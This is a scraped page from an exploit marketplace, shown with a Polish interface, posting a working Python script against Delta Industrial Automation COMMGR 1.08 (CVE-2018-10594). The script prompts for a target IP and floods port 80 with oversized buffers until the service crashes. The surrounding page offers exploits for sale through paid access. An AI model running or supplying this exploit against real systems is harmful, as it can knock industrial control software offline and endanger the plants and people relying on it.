0day.today - Największa Baza Exploitów na Świecie.
![](/img/logo_green.jpg)
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyćGOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow Exploit
Autor
Ryzyko
![](/img/risk/critlow_2.gif)
Średnie Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
CVE
Platforma
# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR - Remote STACK-BASED BUFFER OVERFLOW # Exploit Author: t4rkd3vilz # Vendor Homepage: http://www.deltaww.com/ # Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US # Version: COMMGR Version 1.08 and prior. DVPSimulator EH2, EH3, ES2, SE, SS2 AHSIM_5x0, AHSIM_5x1 # Tested on: Kali Linux # CVE : CVE-2018-10594 #Run exploit, result DOS import socket ip = raw_input("[+] IP to attack: ") sarr = [] i = 0 while True: try: sarr.append(socket.create_connection((ip,80))) print "[+] Connection %d" % i crash1 = "\x41"*4412 +"\X42"*1000 sarr[i].send(crash1+'\r\n') i+=1 except socket.error: print "[*] Server crashed " raw_input() break # 0day.today [2024-07-02] #